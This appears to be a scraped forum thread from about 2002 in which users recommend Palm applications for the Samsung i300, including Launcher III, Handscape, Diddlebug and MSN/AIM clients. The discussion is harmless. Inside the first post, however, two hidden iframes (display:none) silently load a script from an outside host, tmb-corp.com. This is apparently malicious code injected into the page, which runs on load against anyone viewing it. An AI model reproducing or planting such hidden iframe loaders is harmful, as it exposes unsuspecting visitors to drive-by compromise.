+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

Thread: Killer Aps?

Killer Aps?

While absorbing all this technical info and still on the fence on which case to get, I was wondering what everyone thought was the best of the best out there for the I300.

Any suggestions on THE killer ap? A must have.

Being a newbie I've got 2 so far

Avantgo's Mobile Channel Viewer
    and
    American's Flight Schedule

Yeah, I know pretty plain, but I definitely use both of them

NY<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

blazer browser 2.0

FILEZ

launcher III

ooh, the golf game that came with the phone is great!!

smartphonecentral.com
    For me it's the instant messaging apps. Very cool to have access to that wherever. I'm not sure which client I like the most, but I end up on MSN most of the time because that's where most of my contacts are.

BigClock's great too! (Although some people have had probs with the app.)

--Jesse

User ***** Rulz Enforcer

MSN app?

There's an app for MSN Messenger for palm? I couldn't find it. How do you do it?

tia

-chris

I believe you access MSN Messenger fromyour desktop and if you follow menu options are allowed to attach a monile device to sign on and send and receive. www.mobile.msn.com is also a sight to ceck out

1. Iambic's ActionNames. Much better calendaring.

2. Synergy Solution's Listmaker. Much better to-do lists, also used as an outliner.

3. Another vote for Launcher III.

4. Diddlebug (only the Beta works on i300 - search sourceforge.com) - a great (and free) Note pad

Pocket Quicken 2.01

If you use any of the Quicken programs, this is a shining gem! Steep price though. $40 bones. When they do major updates though, $14.95. Try it for free for 14 days.

Whole new worlds are opening up!

Quick question: Is MSN messenger always on. Meaning at any time can people IM me, and the second part, does it use up your minutes?

also What is "Launcher III"?

Although I am not using it for anything but WOW factor, Gmovie is nice.

ny

Originally posted by crlipman
    1. Iambic's ActionNames. Much better calendaring.

2. Synergy Solution's Listmaker. Much better to-do lists, also used as an outliner.

3. Another vote for Launcher III.

4. Diddlebug (only the Beta works on i300 - search sourceforge.com) - a great (and free) Note pad
    Going to try listmaker, but have to disagree with Launcher III. I much prefer Handscape by Mobimate. Have you tried it?

Craig
    I thought grafitti was illegal?

Originally posted by NY_in_TX
    also What is "Launcher III"?
    Launcher III replaces the Palm home page (it doesn't literally replace it - the orig one is always avail for you to use if you want). The most obvious improvement is that it uses a tabbed-interface to replace the drop down in the upper right. Now that I've been using it for years (on may old Palm... ), I've found the little icons at the bottom margin of the screen to be very handy. It also has some other cool utils, such as a delete feature which let's you delete most anything, not just the installed names that you see from the std Delete...

Plus, it's fully compatible - everything works, color, etc. BTW, it's also freeeeeeeeeeee.....

From an initial look, 'looks like Handscape is modelled after LauncherIII (launcher has been around almost since day 1, I think), yet offers alot more features for $20 shareware. Def worth looking at if ya got $20.

smartphonecentral.com
    Actually, the MSN Messenger client is from a company called Ruksun:

http://www.ruksun.com/mobile_computi...essengerforce/

You must establish an Internet connection to use it, so yes, you do use minutes while it is in use. And when you close the program, you are signed out from MSN.

With AIM it's possible to stay logged on while disconnected. You use the AIM client in SprintWeb to log in to the network, and then quit SprintWeb without logging out from AIM. You'll stay logged in, and you'll recieve a Web alert every time you get a new message. I usually check the alert and then fire up the (real) AIM client to chat. (Note: After disconnecting the "real" AIM client, you get logged off the network, so you need to redo the SprintWeb thing afterwards to stay logged in.)

HTH.

--Jesse

Originally posted by csherman

Going to try listmaker, but have to disagree with Launcher III. I much prefer Handscape by Mobimate. Have you tried it?

Craig
    Just downloaded it - thanks for the tip. I'll take a look when I can - there's alot going on with that thing, esp the active desktop thing....

BTW, do ya use views? which ones? Also, does yours have the slight pause switching between tabs?
    Last edited by crlipman; 01-16-2002 at 11:17 AM.

Just downloaded it - thanks for the tip. I'll take a look when I can - there's alot going on with that thing, esp the active desktop thing....

BTW, do ya use views? which ones? Also, does yours have the slight pause switching between tabs?
    Okay, everyone repeat after me:

Craig is a dope! In fact, why not make it your signatures?

I have been using Handscape for over 6 or 7 weeks now and I did not know about "Views"!! I guess I will have to get back to you on which ones I use....
    :o
    Craig

Yea, with the MSN messenger availale at through your desktop, contacts may IM you, but am not sure you can reply from phone. They do, of course, have a version there for pocket pc.

Originally posted by csherman

Okay, everyone repeat after me:

Craig is a dope! In fact, why not make it your signatures?

I have been using Handscape for over 6 or 7 weeks now and I did not know about "Views"!! I guess I will have to get back to you on which ones I use....
    :o
    Craig
    Surprised to hear that (well, at least surprised to hear you hadn't used their views... ). Frankly, the Views is the only thing I would see making it better than LIII. I think the Explorer view is a good attempt, but just too much data to fit on the screen. And, with the delay/ lag in changing tabs, the "prettier" tabbed GUI is actually a detrement.

Why do you like Handscape so much more than LIII...? I'm interested in hearing your thoughts - So far, I've only found reasons NOT to switch to Handscape...

I second the motion for Diddlebug -- but the Address Book plug-in won't work, because Samsung modified the Address Book when they provided phone integration. Just FYI. This is significant for me because that's 90% of what I use Diddlebug for -- rapid scrawling of phone numbers, which I can flick into the address book when I have a spare moment. Still a nice program, though.

Originally posted by Harangutan

I second the motion for Diddlebug -- but the Address Book plug-in won't work, because Samsung modified the Address Book when they provided phone integration. Just FYI. This is significant for me because that's 90% of what I use Diddlebug for -- rapid scrawling of phone numbers, which I can flick into the address book when I have a spare moment. Still a nice program, though.
    er, Diddlebug, or ActionNames...??...

I read a post (yours?) earlier on this, but I really only use it for the Calendar view/ etc. enhancements. The split day view (between mtgs and to-do's) is huge for me.

Surprised to hear that (well, at least surprised to hear you hadn't used their views... ). Frankly, the Views is the only thing I would see making it better than LIII. I think the Explorer view is a good attempt, but just too much data to fit on the screen. And, with the delay/ lag in changing tabs, the "prettier" tabbed GUI is actually a detrement.

Why do you like Handscape so much more than LIII...? I'm interested in hearing your thoughts - So far, I've only found reasons NOT to switch to Handscape...
    Well, because I don't have any original thoughts of my own, I will plagerize here.... (kidding)

I prefer the GUI, and don't find there to be a delay bad enough to cause me any problems. Does Launcher offer color?

Craig

Administrator

Arrow

Does Launcher offer color?

- everything works, color, etc. BTW, it's also freeeeeeeeeeee.....

I guess I should try it again....

C